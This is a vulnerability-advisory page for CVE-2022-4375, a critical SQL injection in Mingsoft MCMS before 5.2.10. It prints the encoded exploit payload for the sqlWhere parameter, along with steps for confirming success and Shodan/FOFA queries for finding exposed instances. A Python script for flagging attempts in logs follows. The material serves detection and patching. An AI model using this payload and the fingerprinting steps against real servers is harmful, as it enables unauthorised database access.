cbcvebase.
CVE-2022-4375
published 2022-12-09


Priority: P2 64
Severity: critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 2.89% (85.1th percentile)

A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to SQL injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 addresses this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.

Affected

11 ranges
Vendor    Product  Version range  Fixed in
mingsoft  mcms     < 5.2.10       5.2.10
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms
mingsoft  mcms

Detection & IOCs (extracted from sources)

url: /cms/category/list
command: sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
other: http.favicon.hash:1464851260
other: icon_hash="1464851260"
  • Exploit sends a POST request to /cms/category/list with a URL-encoded JSON payload in the sqlWhere parameter containing extractvalue(0x7e,concat(0x7e,(database()))) to trigger SQL injection.
  • Successful exploitation is indicated by a 500 or 200 HTTP response containing 'java.sql.SQLSyntaxErrorException' or 'java.sql.SQLException' in the response body.
  • Response body may also contain 'Icategorydao.xml' or 'cms_category' as additional confirmation of SQL injection triggering the MCMS category DAO layer.
  • Fingerprint the target as Mingsoft MCMS by checking the HTTP response body for the string 'mingsoft.net' before attempting exploitation.
  • Use Shodan query http.favicon.hash:1464851260 or FOFA query icon_hash="1464851260" to identify internet-exposed Mingsoft MCMS instances.
  • The vulnerability affects Mingsoft MCMS versions up to and including 5.2.9; version 5.2.10 is patched.
  • The endpoint /cms/category/list accepts the sqlWhere parameter via POST with Content-Type application/x-www-form-urlencoded; the injection is in the sqlWhere field, which is passed unsanitized to the SQL layer.
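
The indicators above can be combined into a log-triage check. The following is an added example, not code from this page or from the MCMS project: it decodes the form-encoded sqlWhere parameter, flags any "field" value that is not a bare identifier, and uses the listed response strings to separate attempts from requests that reached the SQL layer. The event dictionary layout, the identifier-only rule and the column name category_title are assumptions; the sample events are constructed.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

TARGET_PATH = "/cms/category/list"
# Assumption: a legitimate "field" is a bare column identifier.
SAFE_FIELD = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*$")
# Response-body strings the page lists as signs the request hit the DAO layer.
RESPONSE_MARKERS = ("java.sql.SQLSyntaxErrorException", "java.sql.SQLException",
                    "Icategorydao.xml", "cms_category")

def suspicious_fields(body: str) -> list:
    """Return sqlWhere 'field' values that are not plain identifiers."""
    hits = []
    for raw in parse_qs(body, keep_blank_values=True).get("sqlWhere", []):
        try:
            conditions = json.loads(raw)
        except json.JSONDecodeError:
            hits.append(raw)  # unparseable sqlWhere is itself worth review
            continue
        for cond in conditions if isinstance(conditions, list) else [conditions]:
            field = str(cond.get("field", "")) if isinstance(cond, dict) else str(cond)
            if not SAFE_FIELD.match(field):
                hits.append(field)
    return hits

def classify(event: dict) -> str:
    """Label one logged request/response pair (hypothetical event layout)."""
    if event["method"] != "POST" or not event["path"].split("?")[0].endswith(TARGET_PATH):
        return "ignore"
    if not suspicious_fields(event["body"]):
        return "benign"
    leaked = any(marker in event["response_body"] for marker in RESPONSE_MARKERS)
    return "injection-confirmed" if leaked else "injection-attempt"

def _body(field: str) -> str:
    # Constructed request body with the JSON shape of the captured sqlWhere.
    return urlencode({"sqlWhere": json.dumps([{"action": "", "field": field, "el": "eq", "value": "a"}])})

_SQLI = "extractvalue(0x7e,concat(0x7e,(database())))"  # field value quoted on the page
SAMPLE_EVENTS = [  # constructed log events, not real traffic
    {"method": "POST", "path": TARGET_PATH, "body": _body("category_title"), "response_body": '{"result":true}'},
    {"method": "POST", "path": TARGET_PATH, "body": _body(_SQLI), "response_body": "java.sql.SQLSyntaxErrorException: XPATH syntax error"},
    {"method": "POST", "path": TARGET_PATH, "body": _body(_SQLI), "response_body": "<html>403 Forbidden</html>"},
    {"method": "GET", "path": "/index.html", "body": "", "response_body": ""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), suspicious_fields(ev["body"]))
```
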